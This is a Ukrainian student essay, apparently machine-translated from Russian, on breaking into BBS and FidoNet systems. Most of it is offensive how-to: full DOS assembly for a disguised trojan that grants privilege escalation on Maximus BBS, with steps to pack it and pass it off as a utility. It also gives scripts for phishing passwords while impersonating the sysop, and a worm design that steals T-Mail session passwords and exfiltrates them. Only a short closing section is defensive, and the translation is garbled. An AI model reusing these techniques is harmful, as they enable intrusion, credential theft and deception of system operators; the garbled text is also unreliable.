Термінова допомога студентам
Дипломи, курсові, реферати, контрольні...

BBS і FTN сети

РефератДопомога в написанніДізнатися вартістьмоєї роботи

Включив на свій РМ деяку особливість, замість звичної деструкции можна отримати роботу парольний доступ до багатьох поштовим вузлам з усіма звідси наслідками. Як відомо, при вустановке сполуки між двома FTN-мейлерами вони порівнюють свої адреси — й паролі. Тобто спочатку хост отримує основний адресу звонящего мейлера і пароль на сесію. Якщо конфігурації хоста вказані адреса київська і пароль… Читати ще >

BBS і FTN сети (реферат, курсова, диплом, контрольна)

BBS І FTN-СЕТИ.

5 цієї главі описані методи зламування BBS і FTN-сетей, як програмні, і «обманные », Представлений вихідний текст программы-взломщика з коментарями. Докладно розказано про «слабких містах «різних програм для BBS і FTN-сетей. Даються рекомендации захисту компьютера від несанкціонованийного проникнення.

BBS — Bulletin Board System (електронна дошка оголошень). Невеликий інформаційний центр з урахуванням мікрокомп'ютера (з винчестером великого об'єму), якого користувачі можуть підключитися через свій комп’ютер по телефонної мережі як точка — точка.

Работая з BBS, користувачі можуть лише скопіювати звідти имеющийся файл, а й залишити свій. Файлом може бути як лист, і звичайна програма. Зазвичай, BBS працює у нічний час, а днем це звичайне телефонний номер. Головним на BBS є сістемний оператор (SysOp), що й призначає її правил і тематику. Послуги BBS часто безплатні, для зв’язки Польщі з ній досить звичайній термінальній програми. За першого вході потрібно зарегистрироваться, потім абоненту виділяється період времені до роботи. Часто який виділяється часу недостатньо, тоді появляется потреба до злому BBS. Про те, як треба чинити телефонувати та такі BBS, як отримувати звідти файли і писати листи, можна почути в специальной літературі. Завдання, поставлене — розповісти читачеві, какім чином можна підвищити собі рівень доступу або одержати підлогуный доступу до комп’ютера. Для системних операторів це завжди буде ще однією підставою замислитися над тим, як страшні наслідки безграмотности…

Взлом BBS.

Существует дуже багато програм, виділені на создания й підтримки роботи BBS. Розглянемо найпопулярнішу серед них — Maximus.

Несанкционированно проникнути на BBS, одержати доступ закритим областям, знищити інформацію — завдання ставить собі зломщик.

Существуют звані списки файлів, які містять інформація про доступних користувачам цієї BBS ресурсах. Зазвичай, такі списки є у кожній спеціальної тематичної конференції. Користувачі можуть скопіювати звідти будь-якої файл або залишити свій. У конкурсній програмі Maximus списком всіх файлів, доступних в конференции, є файл під назвою files.bbs.

Специально з цією програми створено мову програмування, схожий з мовами З повагою та Pascal. Нею можна писати власні програми.

под BBS. Найімовірніше, саме тому більшість системних операторів воліють використовувати Maximus. Після компіляції написанної програми яку можна додати у загальну базу Maximus, і її почне працювати.

Каждая откомпилированная програма набуває певну маску файла. Откомпилированная МЕС-программа має маску *. bbs, схожую з маскою списку файла. Зазвичай, у цих файлах містяться списки, якщо в коді зустрічаються будь-які службові команди, вони виконані. Цим зломщик і може скористатися.

В Maximus існують дві мови: МЕС і ХУТРО. Мова МЕС дуже проста, дати раду ньому може кожен. Він дає змогу оперувати разособистими даними, заставками на BBS, базою користувачів. Системный оператор обов’язково має знати цю мову.

Используя команду «PRIV_UP «мови МЕС системний оператор может без особливих зусиль підвищувати рівень користувача, за умови, що остання писатиме й відправлятиме файли до станції. З повышением рівня, користувач отримує додаткових можливостей (збільшується доступне до роботи час, обсяг інформації, которую можна з BBS). Цим і може скористатися хакер. Йому залишається тільки знайти BBS, працюючу над програмою Maximus, на доторою є багато файлових конференцій. У цьому одне з цих кінференций мусить бути порожній (тобто у ній має бути файла files. bbs, що містить доступні файли у цій конференції). Таким чином, залишається перевірити тільки одну умову — коли всі копируемые на BBS файли вкладаються у конференцію, що була обрано востаннє, то таку BBS можна зламати без особливих зусиль. Хакеру залишається лише створити файл files. тес, записати до нього команду PRIV_UP, потім відкомпілювати цей файл з допомогою компілятора МЕСА (тепер він називатися files. bbs) та відправити його за BBS. Відтоді хакер може подавати свій рівень доступу, просматривая цю конференцію, що він не досягне рівня системного оператора станції. Після цього комп’ютер виявиться цілком у розпорядженні.

Если б під руками немає компілятора МЕСА, то створити files. bbs можна й вручну. Треба лише створити файл files. bbs, та був ввести до нього команду підвищити рівень — мовою Maximus це лише три символу (код першого — 23h, такі два — символи pU).

Еще один спосіб зламування BBS вміщує неписьменних системних операторов, котрі мають глибокі знання. Він у тому, що у станцію засилається програма (причому байдуже, куди вона потрапить), які самі додасть команду підвищити рівень в файл files.bbs. Під час перегляду доступних файлів хакеру автоматично підніматиметься рівень. Нижче наведено текст схожою вихідної програми — фантазія тут то, можливо безмежна. Ця програма добавляет в файл files. bbs байти, що б рівень користувачеві. Потому, як системний оператор запустить цю програму своєму комп’ютері, програма шукає файл files. bbs і дописує туди три бувайта. Наведений приклад вміщує системних операторів, які тримають свої файли в каталозі, за умовчанням запропонованому програмою для установки. Хоча можна додати пошук files. bbs з усього винчестеру комп’ютера.

assume cs: cseg, ds: cseg cseg segment org 100h start:

.Найдем файл FILES. BBS mov ah, 4Eh mov dx. offset fname mov cx, 20h int 21 h.

;Если файл відсутня, то вийдемо з програми — ;тут нічого виправляти jc exit.

;0ткроем знайдений файл mov ax, 3D02h mov dx, 9Eh int 21 h jc exit.

-.Установим покажчик чтения/записи насамкінець файла mov bx. ax mov ax, 4202h хог сх. сх xor dx, dx int 21h.

Записываем в файл три байта mov ah, 40h mov cx, 3.

mov dx. offset bytes int 21 h jc exit.

;3акроем файл mov ah, 3Eh int 21 h.

[Выдадим повідомлення про помилку і вийдемо в DOS. Річ у тім, ;що відпрацювала програма має викликати підозр системного оператора. Мета — змусити системного оператора.

думать, що файл зіпсований. Можливо, він допустить, іноді ;під час передачі файлів відбуваються помилки, і тому файл ;міг стати непрацездатним exit:

[Выдадим повідомлення про помилку mov ah, 09h.

mov dx, offset message int 21 h.

; Вихід в DOS mov ah, 4Ch int 21 h.

;Mycop — спеціально у тому, щоб упакувати ;файл утилітою PKLITE Garbage db 12 000 dup («A »).

;Имя файла «FILES.BBS «fname db «files.bbs », 0.

;Сообщение про помилку message db «CRC file error », 13,10, «$ «.

.Записываемые байти bytes db 23h, «pU «cseg ends end start.

После того, як файл откомпилирован, його треба упаковувати, щоб системний оператор щось запідозрив. Цей файл міститиме дуже багато незрозумілих символів, і за швидкому перегляді розпізнати приховану у ньому програму практично неможливо.

tasm.exe vzlom. asm tlink.exe vzlom. obj /t pklite vzlom.com.

После цього файл вирушає на BBS і коментується як демонстрационная програма чи як утиліта для DOS. Далі зломщику залишається лише очікувати, поки системний оператор запустить файл. Невдовзі можна дзвонила додому й насолоджуватися. Він не сработает, якщо справжня опція File Titles в Maximus замінено їй задобную.

Получение пароля BBS без взлома.

Рассмотренные вище способи зламування BBS припускають наявність в користувача базових знання системі. Тепер трохи у тому, як можна дістати пароль ще простіше. Практично з кожної BBS существуют недосвідчені користувачі, мають високий рівень доступу (інформація про рівень доступу користувачів BBS доступна майже завжди). Якщо ж такого пункту немає, то «хорошого «користувача завжди можна визначити, наприклад, за часом, що він проводить на станции, чи з обсягу скопійованій і присланої їм інформації. Отже, визначивши людини, паролем якого непогано заволодіти, пишемо йому лист у тому, що у технічних причин (причину придумываїм будь-яку, головне правдоподібну) йому потрібно змінити свій рабочий пароль (пропонуємо новий, наприклад «НАСК01 »). Потому, як користувач змінить свій пароль (цього він повинен відвести дня дватри, що у одного дня може не зателефонувати, на другий — лише змінить пароль, загалом, час йому знадобитися), можна беспрепятственно входити у його ім'ям і користуватися системою. Головне, щоб цей лист було написано від імені системного оператора чи якоїабо адміністратора даної системи. Якщо цю систему Демшевського не дозволяє змінювати ім'я адресата на полі FROM, варто сходити у ній за іншою именьому (приміром, Mr. CoSysOp) і хочеться написати подібний лист. Напевно, зайве попереджати, що дані, зазначені при реєстрації під явно хибним ім'ям, нічого не винні бути справжніми.

Можно запропонувати один спосіб проникнення — метод «забывания пароля ». Уся хитрість у цьому, що з вході у систему вказується ім'я будь-якого користувача цієї BBS, пароль якого, природно, ніхто не знає. Після невдалих спроб введення пароля (зайве намагатися його підібрати, краще вдавати, що пароль забутий, вводячи різні слова, типу Sprite, Cola тощо) потрібно скласти лист системному оператору з проханням поміняти «забутий «пароль в інший. Указиваем новий пароль, потім творимо жалісливу історію какому-небудь хакере, нібито подобравшем наш пароль в інший BBS чи загалом у Інтернет, що робить доводиться використати в всіх системах різні паролі. Якщо системний оператор — не дуже досвідчений, выслушав таку жахливу історію, він обов’язково ввійде у становище несчастного і виконає прохання — змінить поточний пароль запропонований. Далі - повну свободу дій. Працездатність цього методу залежить від цього, наскільки досвідчений оператор, і навіть переконлива чи вигадана історія. Прочитавши її, системний оператор ні навіть і, що його обманюють.

Взлом FTN-сетей.

Что можна сказати про широко використовуваної технології FTN? Множество лазівок для зламування. Чого вартий поштовий файл РКТ, у якому у собі незашифрований пароль, дізнатися який ніяких проблем я не становить! А файли з паролями в шанованому усіма T-Mail, бережуться в нешифрованном вигляді й доступні кожному грамотному людині, втім, як і всі конфігураційні файли найпоширенішийных програм до роботи з FTN? За підсумками подібних промахів в разработке віддавна написані програми, дозволяють зламати чи іншу іншу BBS, викликати режим DoorWay і зробити з віддаленим сервером що завгодно. Проте це ще межа можливостей програміста. Подумаєш, зламати BBS! Влада над одній з BBS — ніщо в сравненді про те, що хакер може тримати у своїй руці пошту від сотень почтовых вузлів, відправляти пошту від чужого імені, діяти від імені другого члена чи користувача FTN. Фантастика? Ні - реальність.

Почитатели Едгара По напевно знають вираз «Червь-Победитель ». Власне, будь-який грамотно написаний «хробак «стане переможителем, коли вийде волю. Особливо із застосуванням свіжих ідей. Застосовуючи технологію РМ (саморазмножающиеся механізми), называемую у народі «комп'ютерні віруси », можна домогтися чималого.

Включив на свій РМ деяку особливість, замість звичної деструкции можна отримати роботу парольний доступ до багатьох поштовим вузлам з усіма звідси наслідками. Як відомо, при вустановке сполуки між двома FTN-мейлерами вони порівнюють свої адреси — й паролі. Тобто спочатку хост отримує основний адресу звонящего мейлера і пароль на сесію. Якщо конфігурації хоста вказані адреса київська і пароль звонящего і вони збігаються з пред’явленим паролем, хост показує звонящему свій пароль і за збігу таких відбувається парольна сесія. Переважна більшість випадків електронна пошта передається лише у парольные сесії, інакше будь-який мейлер міг би пред’явити хосту підставною адреса київська і забрать пошту, призначену й інших. У разі у тому, щоб перехоплювати чужу електронної пошти чи діяти від імені будь-якого системного оператора, необхідно дізнатися паролі на сесію звонящей системи та хоста, чекає на дзвінка. Хтось иронически всміхнеться: «Які ж їх можна почути, якщо неможливо „прикинутися хостом “, щоб звонящая система показала свої паролі, якщо вона телефонує за цілком інакшим номером телефону?! ». Зрозуміло. Але це потрібно. Хтось скаже: «У разі отримати ці паротепер і від хоста не можна, оскільки вона нічого очікувати пред’являти свій пароль і включить парольну сесію, доки побачить, що запропонований пароль збігаються з його паролем! «Звісно. Але це також потрібно. Що й казати зробити? Річ у тім, як і хост, і звонящая система могут піднести свої паролі «на блюдечку ». І тому непотрібно захватывать заручником сім'ю системного оператора чи пропонувати мільйони доларів хазяїну системи — досить розмістити з кимпьютере системного оператора непомітну програму, що ці паролі знайде і доправить на якійсь із зазначених FTN-адресов. От і всі. Більше нічого непотрібно.

Теперь кілька можливостей реалізації цього плану. У країнах колишнього СРСР найчастіше використовується DOS-совместимый мейлер Андрія Йолкіна T-Mail, тому принципи зламування розглянуті з прикладу системи, працюючої саме у його основі. Деякі користуються програмою Антона Дейнова «SantaFox-Mail », принципи її зламування схожі, ще, зламати неї набагато легше благодаря вбудованої функції DoorWay. Але звідси нижче. Отже, що саме програма має зробити і системи, щоб заповітні паролі наконец-то отримано? Власне, алгоритм дуже проста, і описати його можна приблизно так:

1. Визначення розташування програми T-Mail на жорсткому диску системи.

2. Визначення розташування конфігураційних файлів системи.

3. Вилучення списку паролів і адрес з конфігурації системи.

4. Шифрування списку паролів і адрес з эмуляцией PGP-кодирования.

5. Відхід зашифрованого списку паролів і адрес через азлинка по роутингу на систему зломщика.

Теперь розглянемо можливі способи реалізації. Теоретично це складно.

Как правило, системні оператори тримають свій T-Mail на жорсткому діске. Перше завдання — визначити, куди ж оператор сховав своє «сокровище ». Ось і намічається поділ. Можна написати «троянця », підсадити їх у якусь конкретну систему й уміє чекати, коли ця система надішле свої паролі поштою. Але й написати, і «вірус », розходиться сталася на кілька поштових вузлів, після чого все заражені вузли повідомлять паролі сесія із його парольными линками. Можна шукати T-Mail з усього жорсткому диску з допомогою рекурсивного обходу всіх логічних дисків і вкладених каталогів. Зрозуміло, що це метод непогані делікатний, оскільки системний оператор може помітити, що якась програма протягом декількох хвилин почему-те займає вінчестер. Від такої дурості відмовимося. Інша річ, якщо запропонувати цим займатиметься вірус. Чому? І тому, що большинство вірусів відстежують виклики функції 4Bh DOS-прерывания 21h для зараження програм. У разі, що заважає цьому вірусу анализировать запущені програми щодо «а чи не T-Mail це часом? «і визначити «скарби «саме так? Нічого. Аналіз правильніше вестиме як під назвою запускаемого файла, потому що системний оператор міг перейменувати програму, а тому випадку необхідна максимальна надійність. Тому найкраще відлавливать T-Mail по постійної сигнатуре ЕХЕ-файла.

Узнав, де знаходиться програма T-Mail, можна визначити, де знаходяться її конфігураційні файли. Якщо за запуску T-Mail ключ «-З «не заданий (до речі, перехоплення командної рядки — це іще одна доказ на користь те, що пошук програми коректніше виконувати з допомогою вірусу), основним файлом конфігурації є «T-MAIL.CTL », находящийся у тому каталозі, як і T-Mail. Після запуску програми ключ «-З «задає шлях збереження та ім'я основного конфігураційного файла, доторый знадобиться для зламування. Тому треба передбачити обидва варіанта запуску. Після визначення місця розташування основного.

конфигурационного файла потрібно одержати шлях ще до двох файлам — файлу паролів і файлу підстановок (паролі можуть міститися у обох файлах). Важливе зауваження: якщо пароль для будь-якого адреси зазначений в файлі підстановок, його дублер з файла паролів ігнорується.

Путь до файлу паролів зазначений в перемінної Security, до файлу подстановок — в перемінної SubstList. Змінна конфігураційного файла — це рядок, начинающаяся зі спеціальних слів. Наприклад, рядок:

Security C: NETWORKT-MAILPASSWORDS.LST.

называется перемінної Security і має шлях збереження та ім'я файла паролів, тоді як рядок.

SubstList C: NETWORKT-MAILSUBST.LST.

называется, відповідно, перемінної SubstList і має шлях збереження та ім'я файла підстановок. Зрозуміло, було б небажано отправлять ці дві файла вкладенням (attach), оскільки він може потіряться. Надійніше передати ці текстові файли електронною поштою як звичайного листи. Тут виникають проблеми: якщо системний оператор станції, якою проходитиме це (адже всім відомо про її праві читати транзитну пошту), знайде парочи, він негайно попередить звідси того оператора, хто має ці паролі було вкрадено. Останній домовиться з усіма линками про алевых паролях, і всі намагання виявляться даремними. Тобто цілях конспірації доведеться зашифрувати лист, щоб за його перегляді здавалося, що містить прикріплений файл. Зрозуміло, це необов’язково може бути справжній PGP, варто лише внешнього й неможливості швидко розшифрувати засекречене послання. Це непогана гімнастика для розуму, оскільки хакер мусить уміти як розшифровувати, а й маскуватися, як ломати, а й будувати.

Теперь потрібно вибрати адресу, який прийде цього листа. Бажаноале відправити її по e-mail в Internet через FTN-Internet гейт. Річ у цьому, що у цьому випадку постраждалому системному оператору дуже складно знайти відправника. Вочевидь, у цьому листі полі «From: «і зворотний адресу мали бути зацікавленими підставними. Це зіб'є сістемного оператора із пантелику, і вона стане видаляти чи затримувати лист, особливо якщо у нього додано «зайві «клуджи «(c)Via: ». Про те, як створити нетмейл лист, можна прочитати в FTS.

Почему ж SantaFox-Mail зламати набагато простіше? Річ у тім, що здебільшого конфигурационном файлі SF-Mail є змінна, указывающая пароль на режим DoorWay. Від «хробака «потрібно лишедати будь-якої заздалегідь відомий пароль користування DoorWay, після чого слід з'єднатися термінальній програмою, з цієї системоя набирати це слово. Потрапивши у DoorWay, файли паролів і подстановок можна вкрасти «голіруч ». Звісно, якщо системний оператор помітить, що хтось брав в нього ці файли, братиме відповідних заходів. З іншого боку, після зміни паролів можуть з’явитися збої у роботі системи — користувачі намагатимуться ввійти в DoorWay з колишніми паролями, але вони працюватимуть. Зрозуміло, що оператор про це дізнається дуже швидко.

Как засвідчили у частині, «хробак «може лише воровать паролі, а й ставити свої. У T-Mail немає режиму DoorWay, зате є так званий «головний пароль системи », поставлене в змініншої T-Password основного конфігураційного файла. Змінивши цей пароль, можна послати на найвіддаленіші систему лист із відповідающими вказівками до дій і обов’язково домогтися потрібного результату.

Об вказівки докладно написаний документації за програмою T-Mail, але слід пам’ятати, що системний оператор буде сповіщений про невідповідностях і збої у роботі системи.

Безопасность вашої BBS.

Если ви вдома стоїть власна BBS чи тільки збираєтеся її відкрити, спочатку слід подбати про безпечності.

Во-первых, як створити свою BBS, треба вибрати програму нею. Чим більший можливостей надає програма, то більше вписувалося різноманітних лазівок, якими може скористатися хакер. У Maximus ці лазівки вже описані - найкраще не користуватися цією программой. Якщо Maximus все-таки використовується, кращим встановлювати Ш більше жодних додаткових утиліт, оскільки можуть •I, послужити передумовою проникнення хакера на BBS. DOS-SHELL 1В1 луиис відразу прибрати з BBS. Ніколи нікому не можна розкривати свої па- 1 В {1али «копіювати інформацію про користувачів також слід. Бережи- ¦У Т5 троянських програм, копируемых користувачами. Їх можна про- ¦зв¦ верять або отладчиками, або дизассемблером, іншого способу немає, ¦У хіба що для не запускати їх зовсім.

Особое увагу потрібно приділити директоріям. Ніколи не устанавливайте програмний продукт в директорію, запропоновану програмою за умовчанням. Це, безсумнівно, може полегшити роботу будь-який троянской програмі. Не стоїть запускати маленькі файли, потрапили до станції ззовні. Зазвичай таких програм і є «бомбами впределенного дії «.

Вообще найкраща захист — це напад. Річ у тім, що хакерами многие називають цілком безпідставно. Хакер на замовлення фірмы-производителя ламає їх системи, в такий спосіб знаходячи лазівки, які можна використані подібними зломщиками. Тобто хакер шукає «діри », а компанія їх затуляє. Отже, существуют системи, які зламати практично неможливо.

Показати весь текст
Заповнити форму поточною роботою